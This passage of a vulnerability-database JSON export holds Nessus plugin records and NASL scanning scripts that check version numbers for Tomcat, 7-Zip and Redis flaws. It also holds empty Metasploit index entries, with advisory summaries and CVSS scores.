"AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2021-07-28T22:02:18", "description": "According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 20, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-08-10T00:00:00", "title": "EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2018-08-10T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-webapps", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1227.NASL", "href": "https://www.tenable.com/plugins/nessus/111647", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111647);\n script_version(\"1.7\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP3 : tomcat (EulerOS-SA-2018-1227)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1227\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?1c1b3c28\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/07/16\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/08/10\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(3)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP3\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n \"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"3\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T22:02:18", "description": "According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.", "edition": 21, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-07-20T00:00:00", "title": "EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "2018-07-20T00:00:00", "cpe": ["p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api", "p-cpe:/a:huawei:euleros:tomcat", "p-cpe:/a:huawei:euleros:tomcat-admin-webapps", "p-cpe:/a:huawei:euleros:tomcat-webapps", "p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-el-2.2-api", "p-cpe:/a:huawei:euleros:tomcat-lib", "cpe:/o:huawei:euleros:2.0"], "id": "EULEROS_SA-2018-1220.NASL", "href": "https://www.tenable.com/plugins/nessus/111182", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(111182);\n script_version(\"1.8\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2021/01/06\");\n\n script_cve_id(\n \"CVE-2018-8014\"\n );\n\n script_name(english:\"EulerOS 2.0 SP2 : tomcat (EulerOS-SA-2018-1220)\");\n script_summary(english:\"Checks the rpm output for the updated package.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote EulerOS host is missing a security update.\");\n script_set_attribute(attribute:\"description\", value:\n\"According to the version of the tomcat packages installed, the\nEulerOS installation on the remote host is affected by the following\nvulnerability :\n\n - The defaults settings for the CORS filter provided in\n Apache Tomcat 9.0.0.M1 to 9.0.8, 8.5.0 to 8.5.31,\n 8.0.0.RC1 to 8.0.52, 7.0.41 to 7.0.88 are insecure and\n enable 'supportsCredentials' for all origins. It is\n expected that users of the CORS filter will have\n configured it appropriately for their environment\n rather than using it in the default configuration.\n Therefore, it is expected that most users will not be\n impacted by this issue.(CVE-2018-8014)\n\nNote that Tenable Network Security has extracted the preceding\ndescription block directly from the EulerOS security advisory. Tenable\nhas attempted to automatically clean and format it as much as possible\nwithout introducing additional issues.\");\n # https://developer.huaweicloud.com/ict/en/site-euleros/euleros/security-advisories/EulerOS-SA-2018-1220\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?c6f58db6\");\n script_set_attribute(attribute:\"solution\", value:\n\"Update the affected tomcat package.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/30\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/07/20\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-admin-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-el-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-jsp-2.2-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-lib\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-servlet-3.0-api\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:huawei:euleros:tomcat-webapps\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:huawei:euleros:2.0\");\n script_set_attribute(attribute:\"generated_plugin\", value:\"current\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Huawei Local Security Checks\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2021 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/EulerOS/release\", \"Host/EulerOS/rpm-list\", \"Host/EulerOS/sp\");\n script_exclude_keys(\"Host/EulerOS/uvp_version\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"rpm.inc\");\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\n\nrelease = get_kb_item(\"Host/EulerOS/release\");\nif (isnull(release) || release !~ \"^EulerOS\") audit(AUDIT_OS_NOT, \"EulerOS\");\nif (release !~ \"^EulerOS release 2\\.0(\\D|$)\") audit(AUDIT_OS_NOT, \"EulerOS 2.0\");\n\nsp = get_kb_item(\"Host/EulerOS/sp\");\nif (isnull(sp) || sp !~ \"^(2)$\") audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\");\n\nuvp = get_kb_item(\"Host/EulerOS/uvp_version\");\nif (!empty_or_null(uvp)) audit(AUDIT_OS_NOT, \"EulerOS 2.0 SP2\", \"EulerOS UVP \" + uvp);\n\nif (!get_kb_item(\"Host/EulerOS/rpm-list\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\ncpu = get_kb_item(\"Host/cpu\");\nif (isnull(cpu)) audit(AUDIT_UNKNOWN_ARCH);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\" && \"aarch64\" >!< cpu) audit(AUDIT_LOCAL_CHECKS_NOT_IMPLEMENTED, \"EulerOS\", cpu);\nif (\"x86_64\" >!< cpu && cpu !~ \"^i[3-6]86$\") audit(AUDIT_ARCH_NOT, \"i686 / x86_64\", cpu);\n\nflag = 0;\n\npkgs = [\"tomcat-7.0.76-3.h1\",\n \"tomcat-admin-webapps-7.0.76-3.h1\",\n \"tomcat-el-2.2-api-7.0.76-3.h1\",\n \"tomcat-jsp-2.2-api-7.0.76-3.h1\",\n \"tomcat-lib-7.0.76-3.h1\",\n \"tomcat-servlet-3.0-api-7.0.76-3.h1\",\n \"tomcat-webapps-7.0.76-3.h1\"];\n\nforeach (pkg in pkgs)\n if (rpm_check(release:\"EulerOS-2.0\", sp:\"2\", reference:pkg)) flag++;\n\nif (flag)\n{\n security_report_v4(\n port : 0,\n severity : SECURITY_HOLE,\n extra : rpm_report_get()\n );\n exit(0);\n}\nelse\n{\n tested = pkg_tests_get();\n if (tested) audit(AUDIT_PACKAGE_NOT_AFFECTED, tested);\n else audit(AUDIT_PACKAGE_NOT_INSTALLED, \"tomcat\");\n}\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T21:59:49", "description": "The version of 7-Zip installed on the remote Windows host contains a\nflaw in the NArchive::NRar::CHandler::Extract method in \nArchive/Rar/RarHandler.cpp. The issue is triggered as certain input \nis not properly validated when performing 'solid' decompression of a\nRAR archive. With a specially crafted file, a context-dependent \nattacker can corrupt memory to cause a denial of service or \npotentially execute arbitrary code.", "edition": 32, "cvss3": {"exploitabilityScore": 1.8, "cvssV3": {"baseSeverity": "HIGH", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "LOCAL", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 7.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H", "userInteraction": "REQUIRED", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-05-11T00:00:00", "title": "7-Zip < 18.05 Memory Corruption Arbitrary Code Execution", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "MEDIUM", "exploitabilityScore": 8.6, "obtainAllPrivilege": false, "userInteractionRequired": true, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "MEDIUM", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 6.8, "vectorString": "AV:N/AC:M/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-10115"], "modified": "2021-07-02T00:00:00", "cpe": ["cpe:/a:7-zip:7-zip"], "id": "7ZIP_18_05.NASL", "href": "https://www.tenable.com/plugins/nessus/109730", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(109730);\n script_version(\"1.4\");\n script_cvs_date(\"Date: 2019/11/04\");\n\n script_cve_id(\"CVE-2018-10115\");\n script_bugtraq_id(104132);\n script_xref(name:\"IAVA\", value:\"2018-A-0147\");\n\n script_name(english:\"7-Zip < 18.05 Memory Corruption Arbitrary Code Execution\");\n script_summary(english:\"Checks the version of 7-Zip.\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"A compression utility installed on the remote Windows host is affected\nby arbitrary code execution.\");\n script_set_attribute(attribute:\"description\", value:\n\"The version of 7-Zip installed on the remote Windows host contains a\nflaw in the NArchive::NRar::CHandler::Extract method in \nArchive/Rar/RarHandler.cpp. The issue is triggered as certain input \nis not properly validated when performing 'solid' decompression of a\nRAR archive. With a specially crafted file, a context-dependent \nattacker can corrupt memory to cause a denial of service or \npotentially execute arbitrary code.\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.7-zip.org/history.txt\");\n script_set_attribute(attribute:\"see_also\", value:\"https://www.neowin.net/news/peazip-660\");\n # https://nvd.nist.gov/vuln/detail/CVE-2018-10115\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?b2f13c3c\");\n # https://landave.io/2018/05/7-zip-from-uninitialized-memory-to-remote-code-execution/\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?95f517fd\");\n script_set_attribute(attribute:\"solution\", value:\n\"Upgrade to 7-Zip version 18.05 or later.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:P/I:P/A:P\");\n script_set_cvss_temporal_vector(\"CVSS2#E:U/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:L/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:U/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2018-10115\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"No known exploits are available\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/05/01\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/05/11\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/a:7-zip:7-zip\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows\");\n\n script_copyright(english:\"This script is Copyright (C) 2018-2019 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"7zip_installed.nbin\");\n script_require_keys(\"installed_sw/7-Zip\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"global_settings.inc\");\ninclude(\"misc_func.inc\");\ninclude(\"install_func.inc\");\n\napp = '7-Zip';\n\n# Pull the installation information from the KB.\ninstall = get_single_install(app_name:app, exit_if_unknown_ver:TRUE);\n\npath = install['path'];\nversion = install['version'];\n\nfix = \"18.05\";\n\nif (ver_compare(ver:version, fix:fix, strict:FALSE) < 0)\n{\n port = get_kb_item(\"SMB/transport\");\n if (isnull(port)) port = 445;\n\n items = make_array(\"Installed version\", version,\n \"Fixed version\", fix,\n \"Path\", path\n );\n\n order = make_list(\"Path\", \"Installed version\", \"Fixed version\");\n report = report_items_str(report_items:items, ordered_fields:order);\n\n security_report_v4(port:port, extra:report, severity:SECURITY_WARNING);\n exit(0);\n\n}\nelse\n audit(AUDIT_INST_PATH_NOT_VULN, app, version);\n", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-28T23:11:32", "description": "Multiple vulnerabilities were discovered in the Lua subsystem of\nRedis, a persistent key-value database, which could result in denial\nof service.", "edition": 32, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "2018-06-18T00:00:00", "title": "Debian DSA-4230-1 : redis - security update", "type": "nessus", "bulletinFamily": "scanner", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-11218", "CVE-2018-11219"], "modified": "2021-07-02T00:00:00", "cpe": ["p-cpe:/a:debian:debian_linux:redis", "cpe:/o:debian:debian_linux:9.0"], "id": "DEBIAN_DSA-4230.NASL", "href": "https://www.tenable.com/plugins/nessus/110571", "sourceData": "#\n# (C) Tenable Network Security, Inc.\n#\n# The descriptive text and package checks in this plugin were \n# extracted from Debian Security Advisory DSA-4230. The text \n# itself is copyright (C) Software in the Public Interest, Inc.\n#\n\ninclude(\"compat.inc\");\n\nif (description)\n{\n script_id(110571);\n script_version(\"1.5\");\n script_cvs_date(\"Date: 2018/11/13 12:30:47\");\n\n script_cve_id(\"CVE-2018-11218\", \"CVE-2018-11219\");\n script_xref(name:\"DSA\", value:\"4230\");\n\n script_name(english:\"Debian DSA-4230-1 : redis - security update\");\n script_summary(english:\"Checks dpkg output for the updated package\");\n\n script_set_attribute(\n attribute:\"synopsis\", \n value:\"The remote Debian host is missing a security-related update.\"\n );\n script_set_attribute(\n attribute:\"description\", \n value:\n\"Multiple vulnerabilities were discovered in the Lua subsystem of\nRedis, a persistent key-value database, which could result in denial\nof service.\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://security-tracker.debian.org/tracker/source-package/redis\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://packages.debian.org/source/stretch/redis\"\n );\n script_set_attribute(\n attribute:\"see_also\",\n value:\"https://www.debian.org/security/2018/dsa-4230\"\n );\n script_set_attribute(\n attribute:\"solution\", \n value:\n\"Upgrade the redis packages.\n\nFor the stable distribution (stretch), these problems have been fixed\nin version 3:3.2.6-3+deb9u1.\"\n );\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:L/Au:N/C:P/I:P/A:P\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"p-cpe:/a:debian:debian_linux:redis\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:debian:debian_linux:9.0\");\n\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2018/06/17\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2018/06/18\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_copyright(english:\"This script is Copyright (C) 2018 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n script_family(english:\"Debian Local Security Checks\");\n\n script_dependencies(\"ssh_get_info.nasl\");\n script_require_keys(\"Host/local_checks_enabled\", \"Host/Debian/release\", \"Host/Debian/dpkg-l\");\n\n exit(0);\n}\n\n\ninclude(\"audit.inc\");\ninclude(\"debian_package.inc\");\n\n\nif (!get_kb_item(\"Host/local_checks_enabled\")) audit(AUDIT_LOCAL_CHECKS_NOT_ENABLED);\nif (!get_kb_item(\"Host/Debian/release\")) audit(AUDIT_OS_NOT, \"Debian\");\nif (!get_kb_item(\"Host/Debian/dpkg-l\")) audit(AUDIT_PACKAGE_LIST_MISSING);\n\n\nflag = 0;\nif (deb_check(release:\"9.0\", prefix:\"redis-sentinel\", reference:\"3:3.2.6-3+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"redis-server\", reference:\"3:3.2.6-3+deb9u1\")) flag++;\nif (deb_check(release:\"9.0\", prefix:\"redis-tools\", reference:\"3:3.2.6-3+deb9u1\")) flag++;\n\nif (flag)\n{\n if (report_verbosity > 0) security_hole(port:0, extra:deb_report_get());\n else security_hole(0);\n exit(0);\n}\nelse audit(AUDIT_HOST_NOT, \"affected\");\n", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}], "metasploit": [{"lastseen": "2021-07-03T02:57:20", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.0/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.0"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Ubuntu: USN-3665-1 (CVE-2018-8014): Tomcat vulnerabilities", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": false, "cvssV2": {"accessComplexity": "LOW", "confidentialityImpact": "PARTIAL", "availabilityImpact": "PARTIAL", "integrityImpact": "PARTIAL", "baseScore": 7.5, "vectorString": "AV:N/AC:L/Au:N/C:P/I:P/A:P", "version": "2.0", "accessVector": "NETWORK", "authentication": "NONE"}, "acInsufInfo": false, "impactScore": 6.4, "obtainUserPrivilege": false}, "cvelist": ["CVE-2018-8014"], "modified": "1976-01-01T00:00:00", "id": "MSF:ILITIES/UBUNTU-CVE-2018-8014/", "href": "", "sourceData": "", "sourceHref": "", "cvss": {"score": 7.5, "vector": "AV:N/AC:L/Au:N/C:P/I:P/A:P"}}, {"lastseen": "2021-07-08T02:34:04", "description": "\n", "edition": 2, "cvss3": {"exploitabilityScore": 3.9, "cvssV3": {"baseSeverity": "CRITICAL", "confidentialityImpact": "HIGH", "attackComplexity": "LOW", "scope": "UNCHANGED", "attackVector": "NETWORK", "availabilityImpact": "HIGH", "integrityImpact": "HIGH", "baseScore": 9.8, "privilegesRequired": "NONE", "vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H", "userInteraction": "NONE", "version": "3.1"}, "impactScore": 5.9}, "published": "1976-01-01T00:00:00", "type": "metasploit", "title": "Oracle Linux: (CVE-2020-1938) (Multiple Advisories): tomcat6 security update", "bulletinFamily": "exploit", "cvss2": {"severity": "HIGH", "exploitabilityScore": 10.0, "obtainAllPrivilege": false, "userInteractionRequired": false, "obtainOtherPrivilege": 